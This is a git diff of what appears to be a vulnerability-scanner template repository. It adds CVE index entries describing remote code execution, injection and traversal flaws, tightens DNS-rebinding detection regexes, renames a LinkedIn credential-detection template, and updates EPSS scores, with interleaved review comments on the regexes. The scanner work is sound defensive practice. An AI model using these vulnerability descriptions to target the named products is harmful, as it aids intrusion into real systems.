@@ -265,6 +265,7 @@ {"ID":"CVE-2015-1427","Info":{"Name":"ElasticSearch - Remote Code Execution","Severity":"high","Description":"ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1427.yaml"} {"ID":"CVE-2015-1503","Info":{"Name":"IceWarp Mail Server \u003c11.1.1 - Directory Traversal","Severity":"high","Description":"IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1503.yaml"} {"ID":"CVE-2015-1579","Info":{"Name":"WordPress Slider Revolution - Local File Disclosure","Severity":"medium","Description":"Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. 
NOTE: this vulnerability may be a duplicate of CVE-2014-9734.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-1579.yaml"} +{"ID":"CVE-2015-1635","Info":{"Name":"Microsoft Windows 'HTTP.sys' - Remote Code Execution","Severity":"critical","Description":"HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka \"HTTP.sys Remote Code Execution Vulnerability.\"\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2015/CVE-2015-1635.yaml"} {"ID":"CVE-2015-1880","Info":{"Name":"Fortinet FortiOS \u003c=5.2.3 - Cross-Site Scripting","Severity":"medium","Description":"Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-1880.yaml"} {"ID":"CVE-2015-20067","Info":{"Name":"WP Attachment Export \u003c 0.2.4 - Unrestricted File Download","Severity":"high","Description":"The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress\npowered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-20067.yaml"} {"ID":"CVE-2015-2067","Info":{"Name":"Magento Server MAGMI - Directory Traversal","Severity":"medium","Description":"Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. 
(dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2067.yaml"} 
@@ -2170,6 +2171,7 @@ {"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"} {"ID":"CVE-2023-37979","Info":{"Name":"Ninja Forms \u003c 3.6.26 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37979.yaml"} {"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"} +{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. 
Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"} {"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"} {"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"} {"ID":"CVE-2023-3843","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3843.yaml"} 
@@ -2279,14 +2281,17 @@ {"ID":"CVE-2023-6634","Info":{"Name":"LearnPress \u003c 4.2.5.8 - Remote Code Execution","Severity":"critical","Description":"The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6634.yaml"} {"ID":"CVE-2023-6831","Info":{"Name":"mlflow - Path Traversal","Severity":"high","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2023/CVE-2023-6831.yaml"} {"ID":"CVE-2023-6875","Info":{"Name":"WordPress POST SMTP Mailer \u003c= 2.8.7 - Authorization Bypass","Severity":"critical","Description":"The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6875.yaml"} +{"ID":"CVE-2023-6895","Info":{"Name":"Hikvision Intercom Broadcasting System - Command Execution","Severity":"critical","Description":"Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. 
The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6895.yaml"} {"ID":"CVE-2023-6909","Info":{"Name":"Mlflow \u003c2.9.2 - Path Traversal","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2023/CVE-2023-6909.yaml"} {"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"} {"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"} {"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"} +{"ID":"CVE-2024-0305","Info":{"Name":"Ncast busiFacade - Remote Command 
Execution","Severity":"high","Description":"The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-0305.yaml"} {"ID":"CVE-2024-0352","Info":{"Name":"Likeshop \u003c 2.5.7.20210311 - Arbitrary File Upload","Severity":"critical","Description":"A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0352.yaml"} {"ID":"CVE-2024-0713","Info":{"Name":"Monitorr Services Configuration - Arbitrary File Upload","Severity":"high","Description":"A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. 
NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-0713.yaml"} {"ID":"CVE-2024-1021","Info":{"Name":"Rebuild \u003c= 3.5.5 - Server-Side Request Forgery","Severity":"medium","Description":"There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-1021.yaml"} {"ID":"CVE-2024-1061","Info":{"Name":"WordPress HTML5 Video Player - SQL Injection","Severity":"high","Description":"WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-1061.yaml"} +{"ID":"CVE-2024-1071","Info":{"Name":"WordPress Ultimate Member 2.1.3 - 2.8.2 – SQL Injection","Severity":"critical","Description":"The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction \u0026 Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘sorting’ parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-1071.yaml"} {"ID":"CVE-2024-1208","Info":{"Name":"LearnDash LMS \u003c 4.10.3 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. 
This makes it possible for unauthenticated attackers to obtain access to quiz questions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1208.yaml"} {"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"} {"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"} 
@@ -2298,6 +2303,7 @@ {"ID":"CVE-2024-22024","Info":{"Name":"Ivanti Connect Secure - XXE","Severity":"high","Description":"Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-22024.yaml"} {"ID":"CVE-2024-22319","Info":{"Name":"IBM Operational Decision Manager - JNDI Injection","Severity":"critical","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-22319.yaml"} {"ID":"CVE-2024-22320","Info":{"Name":"IBM Operational Decision Manager - Java Deserialization","Severity":"high","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-22320.yaml"} +{"ID":"CVE-2024-23334","Info":{"Name":"aiohttp - Directory Traversal","Severity":"high","Description":"aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. 
This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-23334.yaml"} {"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"} {"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"} {"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index beda5a2a2c..f16efa320f 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt 
@@ -1 +1 @@ -eb2a2554dd005ef35adf0ff115ae4913 +d1c0809e63305403ca431401cfcebe07 diff --git a/dns/dns-rebinding.yaml b/dns/dns-rebinding.yaml index 0ffb8778b6..5c463ba2f4 100644 --- a/dns/dns-rebinding.yaml +++ b/dns/dns-rebinding.yaml @@ -1,5 +1,4 @@ id: dns-rebinding - info: name: DNS Rebinding Attack author: ricardomaia @@ -10,6 +9,8 @@ info: - https://capec.mitre.org/data/definitions/275.html - https://payatu.com/blog/dns-rebinding/ - https://heimdalsecurity.com/blog/dns-rebinding/ + metadata: + max-request: 2 tags: redirect,dns,network dns: @@ -20,7 +21,7 @@ dns: - type: regex part: answer regex: - - 'IN.*A.(\s)*(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})(127\.0\.0\.1|\b10\.\d{1,3}\.\d{1,3}\.\d{1,3}\b|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})$' + - 'IN\s+A\s+(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})$' extractors: - type: regex 
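Review bot: The rewritten A-record matcher in the `@@ -20,7 +21,7 @@` hunk flags only the single address `127.0.0.1`, so a rebinding answer anywhere else in 127.0.0.0/8 (e.g. `127.0.0.2`), `0.0.0.0`, or 169.254.0.0/16 link-local passes undetected, even though the same pattern already accepts all of 10/8, 172.16/12 and 192.168/16. Widening the loopback alternative and adding the other two, in both the matcher and the `IPv4` extractor (the extractor's copy is in the next hunk), keeps the two in step: `- 'IN\s+A\s+(127\.\d{1,3}\.\d{1,3}\.\d{1,3}|0\.0\.0\.0|169\.254\.\d{1,3}\.\d{1,3}|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})$'`. The trailing `$` assumes nuclei renders the answer with the address last; that held for the old pattern too, but is worth confirming when the alternation is extended.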
@@ -28,35 +29,22 @@ dns: name: IPv4 group: 1 regex: - - 'IN.*A.(\s)*(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})(127\.0\.0\.1|\b10\.\d{1,3}\.\d{1,3}\.\d{1,3}\b|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})' + - 'IN\s+A\s+(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})' - name: "{{FQDN}}" type: AAAA matchers: - # IPv6 Compressed + # IPv6 Compressed and Full - type: regex part: answer regex: - - "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{0,4}:){0,5}(:[0-9a-fA-F]{0,4}){1,2}(:)?)$" - - # IPv6 - - type: regex - part: answer - regex: - - "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{1,4}:){0,5}([0-9a-fA-F]{1,4}:){1,2}[0-9a-fA-F]{1,4})$" + - "IN\\s+AAAA\\s+(fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7})" extractors: - type: regex part: answer - name: IPv6_Compressed + name: IPv6_ULA group: 1 regex: - - "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{0,4}:){0,5}(:[0-9a-fA-F]{0,4}){1,2}(:)?)$" - - - type: regex - part: answer - name: IPv6 - group: 1 - regex: - - "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{1,4}:){0,5}([0-9a-fA-F]{1,4}:){1,2}[0-9a-fA-F]{1,4})$" -# digest: 4a0a004730450221009a895344f0f4bf8d0444566a7a2392d2074708d88d29a0922ebb71935290785702200a338fe1517c225d45750b08f80f3a903cd5925a32c542b5559f0202173732be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - "IN\\s+AAAA\\s+(fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7})" +# digest: 4b0a00483046022100f31fd9369022bcafe6da846b246069391f1c22137b8024bb71905634ffa56673022100ea3679256b9518c8853b42432e216d4da6ff3e88ebee349b67e8e8ba7d8a13e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/keys/linkedin-id.yaml b/file/keys/linkedin-id.yaml index be1cbef9c3..18fde1c52f 100644 --- a/file/keys/linkedin-id.yaml +++ b/file/keys/linkedin-id.yaml @@ -1,4 +1,4 @@ -id: linkedin-client-id +id: linkedin-id info: name: Linkedin Client ID 
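Review bot: The new AAAA matcher `IN\s+AAAA\s+(fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7})` covers only the fd00::/8 half of ULA and nothing else, so an answer of `::1`, an IPv4-mapped address such as `::ffff:10.0.0.1`, or an fe80::/10 link-local address (all equally usable for rebinding) produces no finding, and the extractor name `IPv6_ULA` now describes only a slice of what a rebinding check should catch. Because every `{0,7}` group is optional the pattern also accepts the bare token `fd00`, so the `$` anchor the removed patterns carried was doing real work and should return. A fuller alternation for both the matcher and the extractor: `"IN\\s+AAAA\\s+(::1|::ffff:\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}|f[cd][0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){1,7}|fe[89ab][0-9a-fA-F](:[0-9a-fA-F]{0,4}){1,7})$"`; the dotted form of the mapped address presumes Go-style `net.IP` rendering of the answer, which is worth confirming. This hunk ends the file, so nothing further depends on it.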
@@ -13,4 +13,4 @@ file: - type: regex regex: - "(?i)linkedin(.{0,20})?(?-i)[0-9a-z]{12}" -# digest: 4a0a004730450220331335d5d455d18c7d9c53325bd405f4c3af22856d39f387f303fc93bbea1047022100e773cfaf03d6e40a9c7bed4c68de155acaa563c01f97dab67d1d89641bf8ec4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220331335d5d455d18c7d9c53325bd405f4c3af22856d39f387f303fc93bbea1047022100e773cfaf03d6e40a9c7bed4c68de155acaa563c01f97dab67d1d89641bf8ec4e:922c64590222798bb761d5b6d8e72950 diff --git a/headless/cves/2018/CVE-2018-25031.yaml b/headless/cves/2018/CVE-2018-25031.yaml index a495c1a753..a6ed7a6ba6 100644 --- a/headless/cves/2018/CVE-2018-25031.yaml +++ b/headless/cves/2018/CVE-2018-25031.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-25031 cwe-id: CWE-20 epss-score: 0.00265 - epss-percentile: 0.64105 + epss-percentile: 0.65414 cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,7 +30,6 @@ info: shodan-query: http.component:"Swagger" fofa-query: icon_hash="-1180440057" tags: headless,cve,cve2018,swagger,xss,smartbear - headless: - steps: - args: @@ -71,4 +70,4 @@ headless: words: - "swagger" case-insensitive: true -# digest: 4a0a00473045022013f081ac9ee7ec2705ebf232439f9b18c17b162f4e3bfc4485638f324af817df022100e3e262210320011237b59f2a16f32a64e4ad8aba204a3c0f23a4ecda48368644:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220276c4920b8b15fde2802ab2d829106243bfa1d1b5eec02e3ea13925bb1a2367f022012c9b9cb6e5b2906f68da10c6d0aa5c7462f847f906fc82ae576ac26db37fbbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-6271.yaml b/http/cves/2014/CVE-2014-6271.yaml index 2d3350da55..3285c6d48f 100644 --- a/http/cves/2014/CVE-2014-6271.yaml +++ b/http/cves/2014/CVE-2014-6271.yaml 
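Review bot: The `# digest:` line in this hunk is byte-identical before and after (`4a0a00473045022033…bf8ec4e`), with only the missing trailing newline added, even though the previous hunk renamed the template `id` to `linkedin-id`; if the signature covers the template body as it appears to for every other template in this commit (each of those gets a fresh digest when its content changes), this signature no longer matches the content and consumers that verify signatures will treat the template as unsigned or tampered. Re-sign the template so the committed digest corresponds to the renamed content. The remainder of the template lies outside this hunk.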
@@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2014-6271 cwe-id: CWE-78 - epss-score: 0.97564 - epss-percentile: 0.99999 + epss-score: 0.97559 + epss-percentile: 0.99997 cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:* metadata: max-request: 8 @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203c32ed699b5b5784b8f6eddd60a3c06b1a1c8dbefd3024f425307f8f793e0f64022100e4987775a712348ab69dbb368677664e21d2d753a3ba22ab15c2dcd0d426cf49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022022d9c0adae74cdc979a9807c7b6c229b34bbaf77fdf9fb5edbd4263a3e3d939d022100bff54d932fc7f8bc11b979b2289b87a588833b45578f1945d5e8dc9a7021354b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index 93400a28c3..cf44785af5 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-8799 cwe-id: CWE-22 epss-score: 0.17844 - epss-percentile: 0.95686 + epss-percentile: 0.96002 cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206a7436cc97bf8ecebcb667d7af15dcf23669c6fe4558d8041af31eb305bc605e022100f724c31ae974833f30f077f071146f044c59dd077af802bcc254aaa7e7f82ee2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c44ca338e0e27aef8473eed734aaf201ffdbd8635955e4b8e4cbfb37f596bd5802202fa69ab04ca34891ed8896145cbd8e1af1443228c1e766e1cc8f6591c0e74f45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index 1c899630fc..2aa77891ff 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml 
@@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-17431 cwe-id: CWE-287 - epss-score: 0.11315 - epss-percentile: 0.94677 + epss-score: 0.11416 + epss-percentile: 0.95073 cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206e56a0d536dfc8d4ed10ae0505f2d2548b6c986854d0813c6e8185acc66756d9022100e74e57bbb9b04d2860f174d0f9effbef03a265a0ada954ea317f3fffa89a12ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b58e1f2764198a04cdc831884ce49a67189b6a1988fcf7e27f9d82ed83cd2a3402206c36044d3ad9e30032c1e67d471ee256bb7602b09812ffc7830995d5808c7ff1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20463.yaml b/http/cves/2018/CVE-2018-20463.yaml index e4dd013391..a49889b5ff 100644 --- a/http/cves/2018/CVE-2018-20463.yaml +++ b/http/cves/2018/CVE-2018-20463.yaml @@ -15,13 +15,14 @@ info: - https://wordpress.org/plugins/jsmol2wp/ - https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt - https://nvd.nist.gov/vuln/detail/CVE-2018-20463 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-20463 cwe-id: CWE-22 epss-score: 0.01939 - epss-percentile: 0.87393 + epss-percentile: 0.88289 cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:* metadata: verified: true 
